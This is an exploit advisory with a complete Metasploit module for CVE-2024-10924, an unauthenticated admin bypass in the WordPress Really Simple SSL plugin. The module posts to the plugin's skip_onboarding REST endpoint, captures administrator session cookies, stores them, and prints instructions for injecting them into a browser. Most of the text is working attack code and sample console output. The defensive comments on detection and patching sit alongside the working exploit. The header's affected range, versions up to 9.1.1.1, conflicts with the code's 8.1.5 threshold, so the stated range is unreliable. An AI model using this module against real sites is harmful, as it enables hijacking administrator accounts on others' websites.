============================================================================================================================================= | # Title : WordPress Really Simple Security 9.1.1.1 authentication bypass vulnerability | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) | | # Vendor : https://wordpress.org/plugins/ | ============================================================================================================================================= [+] References : https://packetstorm.news/files/id/214234/ & CVE-2024-10924 [+] Summary : This module exploits an authentication bypass vulnerability (CVE-2024-10924) in the Really Simple SSL plugin for WordPress (versions <= 9.1.1.1). The vulnerability exists in the skip_onboarding REST API endpoint. When exploited, the module allows unauthenticated attackers to gain full administrator access by impersonating a valid user ID. [+] Usage : # 1. Vulnerability Check msf6 > use exploit/multi/http/wordpress_really_simple_ssl_auth_bypass msf6 exploit(...) > set RHOSTS target.com msf6 exploit(...) > set TARGETURI /wordpress msf6 exploit(...) > check [+] target.com:80 - Vulnerable version 8.1.3 detected # 2. Exploiting the Vulnerability to Obtain Cookies msf6 exploit(...) > exploit [*] Starting authentication bypass attempt... [+] Authentication bypass successful! [+] Admin access confirmed! [+] MANUAL EXPLOITATION INSTRUCTIONS ====================================== [+] Authentication Bypass Successful! Cookies obtained: wordpress_logged_in_abc=... [+] Next Steps: 1. Visit: http://target.com/wordpress/wp-admin 2. Use cookies from above 3. You should have admin access # 3. 
# Manual Exploitation # Using curl or your browser with cookies
# [+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for CVE-2024-10924 in the Really Simple SSL (now
# "Really Simple Security") WordPress plugin. Read defensively, the flow is:
#   * check                -> fingerprints the plugin from its public readme.txt
#                             ("Stable tag:" line); no credentials involved.
#   * exploit              -> a single unauthenticated POST to the plugin REST
#                             route wp-json/reallysimplessl/v1/two_fa/skip_onboarding;
#                             success is judged solely by a wordpress_logged_in_ /
#                             wordpress_sec_ cookie appearing in the reply.
#   * verify_admin_access  -> GET wp-admin/plugin-install.php with those cookies.
# Detection: an unauthenticated POST to that REST route followed by wp-admin
# requests carrying a freshly issued session cookie is the observable pattern
# (the metadata below declares IOC_IN_LOGS). Mitigation: update the plugin to
# the vendor's patched release and review recent sessions for administrator users.
# NOTE(review): the advisory header on this page states "versions <= 9.1.1.1",
# while the Description, target name and check() in this module all use 8.1.5
# as the threshold. The two disagree; confirm the affected range against the
# vendor references before relying on check() output.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata plus the two user-facing options:
  #   TARGETURI - WordPress base path (default '/')
  #   USER_ID   - the WordPress user ID whose session is requested (default 1)
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'WordPress Really Simple SSL Plugin Authentication Bypass',
      'Description' => %q{
        This module exploits an authentication bypass vulnerability (CVE-2024-10924)
        in the Really Simple SSL plugin for WordPress (versions < 8.1.5).
        The vulnerability exists in the skip_onboarding REST API endpoint.
        When exploited, the module allows unauthenticated attackers to gain
        full administrator access by impersonating a valid user ID.
      },
      'Author' => [
        'JoshuaProvoste', # Original Discovery
        'indoushka' # Professional Refinement
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2024-10924'],
        ['URL', 'https://www.wordfence.com/blog/2024/11/critical-authentication-bypass-vulnerability-patched-in-really-simple-ssl-plugin/'],
        ['URL', 'https://really-simple-ssl.com/cve-2024-10924-authentication-bypass/']
      ],
      'DisclosureDate' => '2024-11-06',
      'Platform' => ['php'],
      'Arch' => ARCH_PHP,
      'Targets' => [
        ['WordPress Really Simple SSL < 8.1.5', {}]
      ],
      'DefaultTarget' => 0,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'Reliability' => [RELIABLE_SIDE_EFFECTS],
        'SideEffects' => [IOC_IN_LOGS] # the REST POST and wp-admin GETs land in web server logs
      }
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'The base path to WordPress', '/']),
      OptInt.new('USER_ID', [true, 'User ID to impersonate (Administrator is usually 1)', 1])
    ])
  end

  # Version fingerprint via the plugin's readme.txt.
  #
  # Returns CheckCode::Unknown when no HTTP response arrives at all,
  # CheckCode::Appears when the readme is served (200) and its "Stable tag"
  # parses below 8.1.5, and CheckCode::Safe in every other case. Note that
  # "every other case" includes a missing readme (e.g. a 404) and a readme
  # with no parsable version line, so Safe here means "not confirmed", not
  # "confirmed patched".
  def check
    vprint_status("Checking Really Simple SSL version...")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'wp-content/plugins/really-simple-ssl/readme.txt')
    })
    return CheckCode::Unknown('Target unreachable') unless res

    if res.code == 200 && res.body.include?('Really Simple SSL')
      # First "Stable tag: x.y.z" occurrence; only digits and dots are captured.
      version = res.body.scan(/Stable tag:\s*([\d.]+)/).flatten.first
      if version
        vprint_status("Found version: #{version}")
        if Rex::Version.new(version) < Rex::Version.new('8.1.5')
          return CheckCode::Appears("Vulnerable version #{version} detected")
        end
        return CheckCode::Safe("Version #{version} is not vulnerable")
      end
    end
    CheckCode::Safe
  end

  # Issues the bypass request and handles the result.
  #
  # The POST carries no cookie or authorization header; `login_nonce` is
  # random filler, so a real WordPress nonce never enters the picture.
  # Success is decided purely by the presence of a wordpress_logged_in_ or
  # wordpress_sec_ cookie in the response (fail_with Failure::NoAccess otherwise).
  # On success the cookies are printed to the console and written to loot —
  # treat both as credential material and purge them after the engagement.
  # If verify_admin_access fails, the cookies are still printed, but no loot
  # entry is written.
  def exploit
    api_path = normalize_uri(target_uri.path, 'wp-json', 'reallysimplessl', 'v1', 'two_fa', 'skip_onboarding')
    print_status("Attempting authentication bypass on #{datastore['RHOST']}...")

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => api_path,
      'headers' => { 'Content-Type' => 'application/json' },
      'data' => {
        'user_id' => datastore['USER_ID'],
        'login_nonce' => Rex::Text.rand_text_alphanumeric(14),
        'redirect_to' => '/wp-admin/'
      }.to_json
    })

    # No response, or a response without a WordPress session cookie -> failure.
    unless res && res.get_cookies =~ /wordpress_(logged_in|sec)_/
      fail_with(Failure::NoAccess, "Bypass failed. No valid session cookies found in response.")
    end

    @cookies = res.get_cookies
    print_good("Successfully obtained authentication cookies.")

    print_status("Verifying administrative access...")
    if verify_admin_access
      print_good("Admin access confirmed via dashboard check!")
      loot_path = store_loot(
        'wp.cookies',
        'text/plain',
        datastore['RHOST'],
        @cookies,
        'wordpress_session_cookies',
        "CVE-2024-10924 Auth Bypass - User ID: #{datastore['USER_ID']}"
      )
      print_status("Session cookies stored at: #{loot_path}")
      report_instructions
      return
    else
      print_warning("Cookies obtained but admin verification failed. User ID might not have admin rights.")
      print_line("Cookies: #{@cookies}")
    end
  end

  # Heuristic admin check: GET wp-admin/plugin-install.php with the obtained
  # cookies and treat the session as administrative when the response is 200,
  # the body mentions 'plugin-install.php', and the body does not mention
  # 'wp-login.php' (used here as the sign of a login redirect). This is a
  # body-string heuristic, not an explicit capability check, so both false
  # positives and false negatives are possible depending on the site's theme
  # and plugins.
  def verify_admin_access
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'plugin-install.php'),
      'cookie' => @cookies
    })
    res && res.code == 200 && res.body.include?('plugin-install.php') && !res.body.include?('wp-login.php')
  end

  # Prints the wp-admin URL, the captured cookies and the follow-up steps.
  # Output only; the cookies echoed here are the same ones stored as loot.
  def report_instructions
    admin_url = full_uri(normalize_uri(target_uri.path, 'wp-admin/'))
    print_line("\n" + "="*70)
    print_line(" EXPLOITATION COMPLETED SUCCESSFULLY")
    print_line("="*70)
    print_line("Admin URL: #{admin_url}")
    print_line("Cookies: #{@cookies}")
    print_line("\nInstructions:")
    print_line("1. Open your browser and navigate to the Admin URL.")
    print_line("2. Use a cookie editor extension to inject the cookies above.")
    print_line("3. Refresh the page to access the WordPress dashboard.")
    print_line("="*70 + "\n")
  end
end

# Greetings to : jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)